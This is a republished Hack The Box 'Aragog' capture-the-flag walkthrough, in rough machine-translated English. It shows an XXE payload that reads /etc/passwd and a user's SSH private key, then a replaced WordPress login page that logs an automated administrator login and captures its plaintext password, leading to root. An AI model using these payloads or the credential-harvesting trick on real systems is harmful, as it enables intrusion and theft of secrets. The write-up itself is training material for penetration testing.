当前位置:网站首页>HTB-Aragog

HTB-Aragog

2022-07-24 23:23:00 H0ne

First step : enumeration 

└─# nmap -sV -O -F --version-light 10.10.10.78
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-18 08:23 EDT
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 08:23 (0:00:00 remaining)
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 08:23 (0:00:03 remaining)
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.10.10.78
Host is up (0.22s latency).
Not shown: 97 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=7/18%OT=21%CT=7%CU=40837%PV=Y%DS=2%DC=I%G=Y%TM=62D550C
OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=103%TI=Z%CI=I%II=I%TS=A)SEQ
OS:(SP=105%GCD=1%ISR=103%TI=Z%CI=I%TS=A)OPS(O1=M539ST11NW7%O2=M539ST11NW7%O
OS:3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST11NW7%O6=M539ST11)WIN(W1=7120%W2=
OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M539NNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.81 seconds

The second step : Get user access

You can see 21 The port is ftp, yes vsfted 3.0.3 service
22 The port is ssh,
adopt ftp File transfer protocol , File transfer 

└─# ftp [email protected] 
Connected to 10.10.10.78.
220 (vsFTPd 3.0.3)
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||42880|)
150 Here comes the directory listing.
-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
226 Directory send OK.
ftp> ls -a
229 Entering Extended Passive Mode (|||46951|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Dec 21  2017 .
drwxr-xr-x    2 ftp      ftp          4096 Dec 21  2017 ..
-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
226 Directory send OK.
ftp> cat test.txt
?Invalid command.
ftp> get test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||45066|)
150 Opening BINARY mode data connection for test.txt (86 bytes).
100% |********************************|    86        2.15 MiB/s    00:00 ETA
226 Transfer complete.
86 bytes received in 00:00 (0.39 KiB/s)

adopt get test.txt Download the file ,test.txt The content is 

<details>
    <subnet_mask>255.255.255.192</subnet_mask>
    <test></test>
</details>

Then the train of thought got stuck , Enumerating tools are generally used dirbuster,gobuster,feroxbuster etc. . This time we use feroxbuster.

# feroxbuster -u http://10.10.10.78/ -x php

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher                  ver: 2.7.0
───────────────────────────┬──────────────────────
   Target Url            │ http://10.10.10.78/
   Threads               │ 50
   Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
   Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]                                                                           
   Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.7.0
   Config File           │ /etc/feroxbuster/ferox-config.toml
   Extensions            │ [php]
   HTTP methods          │ [GET]
   Recursion Depth       │ 4
   New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
   Press [ENTER] to use the Scan Management Menu
──────────────────────────────────────────────────
[>-------------------] - 0s         1/60000   7h      found:0       errors:0 [>-------------------] - 0s         2/60000   6h      found:0       errors:0 [>-------------------] - 0s         3/60000   5h      found:0       errors:0

Insert picture description here
visit http://10.10.10.78/hosts.php
Insert picture description here
burpsuite Grab the bag , Before integration test.php Of xml,post Re contract
Insert picture description here
Successful response , It looks like a subnet calculator , We fake it xml sentence , structure XXE.

<?xml version="1.0" ?>
<!DOCTYPE XXE [<!ENTITY test SYSTEM "file:///etc/passwd"> ]>
<details>
    <subnet_mask>&test;</subnet_mask>
    <test></test>
</details>

Insert picture description here
Echo this message in
florian1000:1000:florian,:/home/florian:/bin/bash
stay home The user in the directory is florian
Print the user logo
Insert picture description here

The third step : obtain root jurisdiction

First get the user florian Private ownership of ssh secret key ,
The key is stored in /home/florian/.ssh/id_rsa

<!--?xml version="1.0" ?-->
<!DOCTYPE XXE [<!ENTITY test SYSTEM "file:///home/florian/.ssh/id_rsa"> ]>
<details>
    <subnet_mask>&test;</subnet_mask>
    <test></test>
</details>

Insert picture description here
take id_rsa Copy and paste the contents of to the local
then ssh secret key florian Login as user 

└─# ssh -i id_rsa [email protected]
Last login: Fri Jan 12 13:56:45 2018 from 10.10.14.3

[email protected]:~$ cd /var/
[email protected]:/var$ ls
backups  crash  lib    lock  mail     opt  snap   tmp
cache    ftp    local  log   metrics  run  spool  www
[email protected]:/var$ cd www
[email protected]:/var/www$ ls
html
[email protected]:/var/www$ cd html
[email protected]:/var/www/html$ ls
dev_wiki  hosts.php  index.html  zz_backup
[email protected]:/var/www/html$ cd dev_wiki/
[email protected]:/var/www/html/dev_wiki$ ls
index.php        wp-blog-header.php    wp-includes        wp-settings.php
license.txt      wp-comments-post.php  wp-links-opml.php  wp-signup.php
readme.html      wp-config.php         wp-load.php        wp-trackback.php
wp-activate.php  wp-content            wp-login.php       xmlrpc.php
wp-admin         wp-cron.php           wp-mail.php

Found here wordpress Framework documents
visit http://10.10.10.78/dev_wiki/index.php
The web page is not normal , and 10.10.10.78 No domain name resolution
Redirection will aragog Add to /etc/hosts In file ,
Execute on your own command side 

┌──(root㉿kali)-[/home/kali/Desktop]
└─# echo '10.10.10.78 aragog'  >> /etc/hosts

See normal wordpress After website , take wp-login.php Replace the content of with 

<?php
// https://gist.github.com/magnetikonline/650e30e485c0f91f2f40

class DumpHTTPRequestToFile {
    

	public function execute($targetFile) {
    

		$data = sprintf(
			"%s %s %s\n\nHTTP headers:\n",
			$_SERVER['REQUEST_METHOD'],
			$_SERVER['REQUEST_URI'],
			$_SERVER['SERVER_PROTOCOL']
		);

		foreach ($this->getHeaderList() as $name => $value) {
    
			$data .= $name . ': ' . $value . "\n";
		}

		$data .= "\nRequest body:\n";

		file_put_contents(
			$targetFile,
			$data . file_get_contents('php://input') . "\n"
		);

		echo("Done!\n\n");
	}

	private function getHeaderList() {
    

		$headerList = [];
		foreach ($_SERVER as $name => $value) {
    
			if (preg_match('/^HTTP_/',$name)) {
    
				// convert HTTP_HEADER_NAME to Header-Name
				$name = strtr(substr($name,5),'_',' ');
				$name = ucwords(strtolower($name));
				$name = strtr($name,' ','-');

				// add to list
				$headerList[$name] = $value;
			}
		}

		return $headerList;
	}
}


(new DumpHTTPRequestToFile)->execute('./dumprequest.txt');

wait for dumpprequest.txt The file appears ,

[email protected]:/var/www/html/dev_wiki$ cat dumprequest.txt
POST /dev_wiki/wp-login.php HTTP/1.1

HTTP headers:
Host: 127.0.0.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
Cookie: wordpress_test_cookie=WP Cookie check

Request body:
pwd=%21KRgYs%28JFO%21%26MTr%29lf&wp-submit=Log+In&testcookie=1&log=Administrator&redirect_to=http%3A%2F%2F127.0.0.1%2Fdev_wiki%2Fwp-admin%2F

pwd yes url code After decoding !KRgYs(JFO!&MTr)lf
su root Right to raise
cat /root/root.txt

原网站

版权声明
本文为[H0ne]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/202/202207201547032009.html

边栏推荐

猜你喜欢

随机推荐